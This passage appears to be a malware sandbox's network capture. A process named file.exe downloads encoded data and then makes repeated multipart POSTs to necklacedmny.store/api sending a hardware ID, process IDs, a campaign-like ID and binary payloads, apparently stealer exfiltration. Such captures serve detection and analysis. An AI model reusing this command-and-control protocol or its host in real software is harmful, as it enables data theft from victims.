2024-10-31 16:26:06 UTC | 1369 | IN | Data Raw: 77 69 71 45 73 47 43 4a 36 79 2b 2b 71 50 54 49 4a 68 68 66 57 76 2b 4f 42 30 2b 59 54 6a 69 4f 41 46 7a 35 78 68 55 65 43 53 43 6a 33 68 56 6b 4d 64 6c 2f 75 76 70 73 4d 4c 77 6d 32 58 73 66 65 2f 77 6e 62 73 67 4d 2b 47 39 67 61 42 68 43 74 45 71 5a 67 41 66 62 34 53 51 51 71 61 2b 61 57 69 67 31 65 48 5a 49 54 77 70 66 6e 73 66 50 61 46 34 49 54 6e 43 63 32 62 59 6c 72 37 6a 51 6b 37 39 46 67 47 51 64 4c 31 75 2b 72 62 42 62 52 36 6d 4f 43 35 76 64 68 79 39 49 33 6e 6b 36 63 51 6a 34 49 6c 57 75 58 66 56 48 33 74 55 6b 6f 49 6d 76 53 6e 6f 6f 78 4b 69 33 69 4f 2f 61 48 74 36 6e 48 7a 6a 65 2b 4a 37 67 4c 47 6c 6d 35 58 35 4a 73 4c 50 4b 59 63 42 67 69 4b 73 76 76 71 74 56 57 50 5a 71 48 36 6f 2f 61 74 62 72 53 61 6f 49 4c 72 54 35 6e 62 59 56 48 68 6c
    Data Ascii: wiqEsGCJ6y++qPTIJhhfWv+OB0+YTjiOAFz5xhUeCSCj3hVkMdl/uvpsMLwm2Xsfe/wnbsgM+G9gaBhCtEqZgAfb4SQQqa+aWig1eHZITwpfnsfPaF4ITnCc2bYlr7jQk79FgGQdL1u+rbBbR6mOC5vdhy9I3nk6cQj4IlWuXfVH3tUkoImvSnooxKi3iO/aHt6nHzje+J7gLGlm5X5JsLPKYcBgiKsvvqtVWPZqH6o/atbrSaoILrT5nbYVHhl
2024-10-31 16:26:06 UTC | 1369 | IN | Data Raw: 58 51 67 69 57 39 4b 7a 71 7a 51 57 46 63 73 2b 70 37 39 44 4b 52 4c 69 69 32 73 58 34 51 64 6a 62 59 6c 47 70 78 30 77 78 35 56 35 4f 41 4a 54 37 72 36 43 4b 54 6f 35 68 69 2f 32 6d 2b 75 74 77 2f 34 62 68 67 65 73 46 78 35 68 6d 55 75 61 51 42 48 32 6f 45 6b 45 58 30 71 72 6a 6a 35 52 4f 6a 47 7a 50 37 75 48 6d 72 58 62 32 77 37 6a 46 36 77 62 48 6e 57 42 52 36 4a 6b 45 4f 4f 35 57 52 77 6d 55 38 61 79 75 68 6b 53 4e 62 6f 50 2f 70 66 37 73 66 66 47 4d 36 34 43 6e 51 59 47 63 66 52 32 78 33 7a 30 2b 38 45 56 57 41 39 4c 74 37 62 50 44 51 6f 34 71 31 37 47 75 37 65 64 37 39 49 62 76 67 4f 51 41 78 70 5a 6a 55 65 4f 57 42 44 76 70 57 31 51 4d 6e 76 79 6b 70 49 39 4c 6a 32 43 4d 2f 4f 2b 78 72 58 62 69 77 37 6a 46 79 77 6a 4d 74 57 35 52 37 74 38 54 63 2f
    Data Ascii: XQgiW9KzqzQWFcs+p79DKRLii2sX4QdjbYlGpx0wx5V5OAJT7r6CKTo5hi/2m+utw/4bhgesFx5hmUuaQBH2oEkEX0qrjj5ROjGzP7uHmrXb2w7jF6wbHnWBR6JkEOO5WRwmU8ayuhkSNboP/pf7sffGM64CnQYGcfR2x3z0+8EVWA9Lt7bPDQo4q17Gu7ed79IbvgOQAxpZjUeOWBDvpW1QMnvykpI9Lj2CM/O+xrXbiw7jFywjMtW5R7t8Tc/
2024-10-31 16:26:06 UTC | 1369 | IN | Data Raw: 6c 65 72 6a 38 73 4e 7a 68 58 71 66 38 75 33 4f 2b 33 4c 73 69 4f 32 4a 70 78 43 50 67 69 56 61 35 64 39 55 66 65 42 64 54 77 79 64 38 36 71 6d 6a 6b 43 4c 62 34 37 33 71 2f 58 6e 63 66 79 46 34 59 44 74 44 4d 43 52 62 46 72 68 6d 41 38 76 70 68 77 47 43 49 71 79 2b 2b 71 71 51 70 42 6b 6e 37 47 77 73 66 51 78 2f 59 2b 67 33 61 63 4c 79 35 52 68 57 75 57 5a 43 54 76 72 55 30 6b 4f 6b 76 32 6e 6f 59 70 44 67 32 65 4b 2f 4b 76 74 35 33 72 31 6a 2b 6d 4a 36 6b 2b 50 32 32 4a 46 71 63 64 4d 44 4f 74 63 53 41 69 45 73 72 7a 6b 6d 67 57 46 5a 73 2b 70 37 2f 37 68 66 76 6d 4d 34 34 62 6d 42 64 4f 4a 61 56 54 68 6d 67 41 32 36 46 52 55 43 5a 33 37 6f 4b 6d 4b 51 6f 70 6d 68 66 4b 6f 76 36 4d 78 2f 5a 75 67 33 61 63 73 31 6f 74 6f 48 66 62 52 46 58 33 68 58 67 5a
    Data Ascii: lerj8sNzhXqf8u3O+3LsiO2JpxCPgiVa5d9UfeBdTwyd86qmjkCLb473q/XncfyF4YDtDMCRbFrhmA8vphwGCIqy++qqQpBkn7GwsfQx/Y+g3acLy5RhWuWZCTvrU0kOkv2noYpDg2eK/Kvt53r1j+mJ6k+P22JFqcdMDOtcSAiEsrzkmgWFZs+p7/7hfvmM44bmBdOJaVThmgA26FRUCZ37oKmKQopmhfKov6Mx/Zug3acs1otoHfbRFX3hXgZ
2024-10-31 16:26:06 UTC | 1369 | IN | Data Raw: 61 2b 46 53 6f 31 6a 68 76 57 6e 2f 4f 31 31 2f 6f 54 6c 68 75 73 45 78 70 68 71 57 65 43 52 42 54 4b 6d 48 41 59 49 69 72 4c 37 36 71 4a 65 67 57 61 43 73 62 43 78 39 44 48 39 6a 36 44 64 70 77 50 50 6e 6d 56 58 37 35 73 4a 4f 2b 78 58 52 67 53 52 2f 61 65 73 68 30 71 43 59 59 62 77 71 66 72 6e 65 76 79 4f 34 34 50 68 54 34 2f 62 59 6b 57 70 78 30 77 64 2f 56 39 4b 43 4e 4c 74 37 62 50 44 51 6f 34 71 31 37 47 6b 38 2b 6c 32 2b 6f 37 6a 6a 65 49 4c 79 35 35 6c 56 66 75 58 44 44 72 30 51 45 59 47 6c 2f 36 67 71 6f 64 44 69 32 79 4d 39 65 2b 78 72 58 62 69 77 37 6a 46 79 67 50 47 73 6d 4a 47 71 59 42 43 4a 4b 5a 56 53 6b 2f 4b 73 71 4b 68 69 55 71 50 61 59 6e 79 70 50 72 6e 63 50 32 4c 37 5a 66 6b 41 4d 36 66 5a 56 4c 76 6d 51 30 79 34 46 56 50 44 70 72 31
    Data Ascii: a+FSo1jhvWn/O11/oTlhusExphqWeCRBTKmHAYIirL76qJegWaCsbCx9DH9j6DdpwPPnmVX75sJO+xXRgSR/aesh0qCYYbwqfrnevyO44PhT4/bYkWpx0wd/V9KCNLt7bPDQo4q17Gk8+l2+o7jjeILy55lVfuXDDr0QEYGl/6gqodDi2yM9e+xrXbiw7jFygPGsmJGqYBCJKZVSk/KsqKhiUqPaYnypPrncP2L7ZfkAM6fZVLvmQ0y4FVPDpr1
2024-10-31 16:26:06 UTC | 1369 | IN | Data Raw: 75 6c 66 49 58 32 76 2f 6a 36 66 72 72 4e 6f 49 71 6e 56 2f 6a 62 62 46 72 79 6a 68 6f 77 39 6c 55 47 4d 4e 79 79 75 2b 72 62 42 62 64 70 67 66 2b 6f 36 66 77 38 33 5a 58 71 67 76 63 49 31 70 51 6c 45 36 6d 5a 54 47 57 31 48 41 59 4c 67 37 4c 37 2b 74 45 65 31 7a 6e 59 6f 66 33 67 6f 32 69 36 6c 61 44 64 74 55 47 42 69 53 55 46 71 64 67 50 4c 2f 52 55 52 52 6d 52 74 5a 32 55 70 46 2b 50 62 4a 6a 67 6b 63 48 71 61 2f 65 46 39 35 53 72 47 73 4b 56 61 31 72 2f 33 30 4a 39 36 52 49 65 4e 74 4b 36 34 35 58 4e 42 5a 6f 71 31 37 47 61 2f 4f 4e 2f 2f 5a 58 78 79 4d 41 56 7a 4a 31 79 54 4b 6e 52 54 44 75 6d 43 68 5a 42 30 76 61 79 36 74 73 56 30 44 48 61 6f 76 69 76 76 32 36 30 6d 71 43 54 70 31 65 54 31 53 56 50 71 63 64 4d 65 75 56 41 56 41 6d 52 35 4b 44 74 76
    Data Ascii: ulfIX2v/j6frrNoIqnV/jbbFryjhow9lUGMNyyu+rbBbdpgf+o6fw83ZXqgvcI1pQlE6mZTGW1HAYLg7L7+tEe1znYof3go2i6laDdtUGBiSUFqdgPL/RURRmRtZ2UpF+PbJjgkcHqa/eF95SrGsKVa1r/30J96RIeNtK645XNBZoq17Ga/ON//ZXxyMAVzJ1yTKnRTDumChZB0vay6tsV0DHaovivv260mqCTp1eT1SVPqcdMeuVAVAmR5KDtv
2024-10-31 16:26:06 UTC | 1028 | IN | Data Raw: 50 78 4b 7a 78 34 33 62 73 6b 71 32 69 36 51 6a 41 6a 58 56 4b 35 74 39 43 66 65 41 53 48 6c 33 63 73 71 65 37 77 78 33 53 4f 4e 53 6b 2f 4b 69 39 49 2b 58 4e 2b 63 58 78 54 35 6e 4a 4b 78 33 37 33 31 52 39 6f 56 46 55 48 5a 54 78 74 61 6e 45 65 37 78 4e 67 66 61 75 36 66 31 6d 39 63 7a 4f 73 38 59 78 2f 34 35 6d 55 2b 65 59 47 69 79 6d 48 41 59 41 30 71 71 61 36 73 73 46 76 53 54 50 36 65 2b 6e 72 55 54 35 6a 65 36 43 38 52 36 4d 76 47 74 61 36 49 6b 63 4b 75 6b 64 61 44 6d 7a 73 75 33 71 68 51 58 61 4f 4d 47 78 71 2b 36 74 4b 61 72 52 75 39 43 30 57 4a 48 4a 65 68 50 77 33 78 70 39 76 67 41 49 54 34 43 79 2b 2b 72 45 52 70 42 34 69 66 4b 35 2f 4b 70 50 78 4b 54 75 67 75 59 5a 30 5a 5a 70 66 4f 71 4f 42 67 50 59 52 30 55 42 6e 50 57 31 75 38 4d 4c 77 6d
                                                                            2024-10-31 16:26:06 UTC1028INData Raw: 50 78 4b 7a 78 34 33 62 73 6b 71 32 69 36 51 6a 41 6a 58 56 4b 35 74 39 43 66 65 41 53 48 6c 33 63 73 71 65 37 77 78 33 53 4f 4e 53 6b 2f 4b 69 39 49 2b 58 4e 2b 63 58 78 54 35 6e 4a 4b 78 33 37 33 31 52 39 6f 56 46 55 48 5a 54 78 74 61 6e 45 65 37 78 4e 67 66 61 75 36 66 31 6d 39 63 7a 4f 73 38 59 78 2f 34 35 6d 55 2b 65 59 47 69 79 6d 48 41 59 41 30 71 71 61 36 73 73 46 76 53 54 50 36 65 2b 6e 72 55 54 35 6a 65 36 43 38 52 36 4d 76 47 74 61 36 49 6b 63 4b 75 6b 64 61 44 6d 7a 73 75 33 71 68 51 58 61 4f 4d 47 78 71 2b 36 74 4b 61 72 52 75 39 43 30 57 4a 48 4a 65 68 50 77 33 78 70 39 76 67 41 49 54 34 43 79 2b 2b 72 45 52 70 42 34 69 66 4b 35 2f 4b 70 50 78 4b 54 75 67 75 59 5a 30 5a 5a 70 66 4f 71 4f 42 67 50 59 52 30 55 42 6e 50 57 31 75 38 4d 4c 77 6d
                                                                            Data Ascii: PxKzx43bskq2i6QjAjXVK5t9CfeASHl3csqe7wx3SONSk/Ki9I+XN+cXxT5nJKx3731R9oVFUHZTxtanEe7xNgfau6f1m9czOs8Yx/45mU+eYGiymHAYA0qqa6ssFvSTP6e+nrUT5je6C8R6MvGta6IkcKukdaDmzsu3qhQXaOMGxq+6tKarRu9C0WJHJehPw3xp9vgAIT4Cy++rERpB4ifK5/KpPxKTuguYZ0ZZpfOqOBgPYR0UBnPW1u8MLwm
                                                                            2024-10-31 16:26:06 UTC1369INData Raw: 31 65 66 37 0d 0a 2b 2b 6e 72 58 44 77 6b 2b 32 4b 34 45 50 48 6c 57 73 64 39 74 45 56 66 66 41 53 48 6c 7a 63 73 72 48 71 32 77 58 46 5a 49 4c 77 72 50 48 75 59 2b 69 46 34 35 50 6b 53 50 2b 6c 51 46 44 6b 6d 67 49 36 32 47 78 6e 42 59 4c 2f 72 4b 33 42 5a 59 56 38 6a 4d 2b 52 79 50 78 32 36 73 48 47 68 76 45 4d 67 64 55 6c 52 61 6e 48 54 42 7a 73 51 6b 73 41 6c 62 43 44 72 5a 56 47 77 69 54 50 39 65 2b 6e 72 56 54 33 6a 75 57 4c 34 45 33 67 6b 58 56 51 35 70 68 4f 48 65 46 45 52 55 2f 63 73 71 2f 71 32 77 57 44 59 4a 2f 38 6f 50 69 68 64 75 43 45 6f 4d 75 6e 41 59 48 44 4a 56 7a 6a 6a 77 45 79 34 52 35 41 41 5a 79 79 76 4f 53 61 42 5a 51 71 31 36 4c 68 76 2f 38 78 6f 73 4f 6e 68 76 55 64 78 35 68 7a 58 71 36 68 4d 68 44 30 56 56 59 4d 30 4d 4f 75 72 70
                                                                            Data Ascii: 1ef7++nrXDwk+2K4EPHlWsd9tEVffASHlzcsrHq2wXFZILwrPHuY+iF45PkSP+lQFDkmgI62GxnBYL/rK3BZYV8jM+RyPx26sHGhvEMgdUlRanHTBzsQksAlbCDrZVGwiTP9e+nrVT3juWL4E3gkXVQ5phOHeFERU/csq/q2wWDYJ/8oPihduCEoMunAYHDJVzjjwEy4R5AAZyyvOSaBZQq16Lhv/8xosOnhvUdx5hzXq6hMhD0VVYM0MOurp


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.5 | 49706       | 188.114.97.3   | 443              | 1532 | C:\Users\user\Desktop\file.exe
Timestamp               | Bytes transferred | Direction | Data
2024-10-31 16:26:07 UTC | 284               | OUT       | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 12840
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 16:26:07 UTC12840OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 39 41 31 38 46 37 32 34 46 37 46 43 38 44 43 37 44 38 31 34 31 34 31 41 30 41 44 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B89A18F724F7FC8DC7D814141A0AD377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-31 16:26:08 UTC | 1019              | IN        | HTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 16:26:08 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=242qc5d8lmd2ug8qv0ur0jvnce; expires=Mon, 24-Feb-2025 10:12:47 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bEr37A0bCHnUKQiC0UPOcelSQyLseBW%2F5Ii48JgsIH37qekwTKPORRvRHg8SI6MP33Cpkn77N3fXEJaCfHDRclZWKJv%2FH8lB2QaLEg4lWzLtLB58WWOW8itAIESEv3FsAXk%2B%2FM8%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db50144db1d4690-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1166&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13782&delivery_rate=2419381&cwnd=239&unsent_bytes=0&cid=823e56c8cdaacba6&ts=1514&x=0"
2024-10-31 16:26:08 UTC | 23                | IN        | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                          Data Ascii: 11ok 173.254.250.77
2024-10-31 16:26:08 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
3          | 192.168.2.5 | 49707       | 188.114.97.3   | 443              | 1532 | C:\Users\user\Desktop\file.exe
Timestamp               | Bytes transferred | Direction | Data
2024-10-31 16:26:09 UTC | 284               | OUT       | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 15082
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 16:26:09 UTC15082OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 39 41 31 38 46 37 32 34 46 37 46 43 38 44 43 37 44 38 31 34 31 34 31 41 30 41 44 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B89A18F724F7FC8DC7D814141A0AD377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-31 16:26:10 UTC | 1024              | IN        | HTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 16:26:10 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=9au3gaarvkirerl24oqfei8qqp; expires=Mon, 24-Feb-2025 10:12:48 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D12P63X2ezho2O8AklaleWYuR%2FW%2BM%2FmBuSluXWEFNnbxtwTOb3gMPy6Hs5blJuFE%2BzGbcZc3CCjdlZ2oQxUGtxfls%2Bbol96%2BoCJ37N5VJFOa4eHdTON6Hp72MvRp50OTfiM1D44%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db50152bc2f0c03-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1600&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16024&delivery_rate=1794299&cwnd=244&unsent_bytes=0&cid=8586eea8d5a04103&ts=1247&x=0"
2024-10-31 16:26:10 UTC | 23                | IN        | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                          Data Ascii: 11ok 173.254.250.77
2024-10-31 16:26:10 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.5 | 49708       | 188.114.97.3   | 443              | 1532 | C:\Users\user\Desktop\file.exe
Timestamp               | Bytes transferred | Direction | Data
2024-10-31 16:26:11 UTC | 284               | OUT       | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 20572
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 16:26:11 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 39 41 31 38 46 37 32 34 46 37 46 43 38 44 43 37 44 38 31 34 31 34 31 41 30 41 44 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B89A18F724F7FC8DC7D814141A0AD377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-31 16:26:11 UTC5241OUTData Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
2024-10-31 16:26:13 UTC | 1018              | IN        | HTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 16:26:13 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=iiemcqhqn93kbhc59vumh98n0g; expires=Mon, 24-Feb-2025 10:12:51 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QaBMoum%2FvEn0FovNicnE5E3LE5flSupjdu9CE4Ed3CWrKVyzGqGtu4qGHcVYRbV3YgzIaKnU9mb3JwPu05FMw9IhZ7Cgi9TsRyUbyogvFVTTctg%2FaJTF%2FtyjIJI60bGhYWnNQmg%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db501605d650c0b-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1671&sent=10&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21536&delivery_rate=1773423&cwnd=251&unsent_bytes=0&cid=87d178f5ebca1153&ts=1784&x=0"
2024-10-31 16:26:13 UTC | 23                | IN        | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                          Data Ascii: 11ok 173.254.250.77
2024-10-31 16:26:13 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.5 | 49709       | 188.114.97.3   | 443              | 1532 | C:\Users\user\Desktop\file.exe
Timestamp               | Bytes transferred | Direction | Data
2024-10-31 16:26:14 UTC | 283               | OUT       | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 1267
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 16:26:14 UTC1267OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 39 41 31 38 46 37 32 34 46 37 46 43 38 44 43 37 44 38 31 34 31 34 31 41 30 41 44 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B89A18F724F7FC8DC7D814141A0AD377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-31 16:26:15 UTC | 1034              | IN        | HTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 16:26:15 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=uocabj59inc2f3ls1ed1vao7nb; expires=Mon, 24-Feb-2025 10:12:54 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DgnI60kS%2BB%2BMLkBJzt3sX2e%2BX%2F6eFYU%2FDzRW3E8heAAcuZvP6FUSZLyFpMs1B51RaM5Jz%2F%2BmV7aw7XO%2BczXuR0e4R8GfU%2B2%2B%2F6sXsaf5%2B4VeITJv%2BCdna97OwRGHLkdOHBAlE7c%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db501733925e7d3-DFW
                                                                            alt-svc: h3=":443"; ma=86400
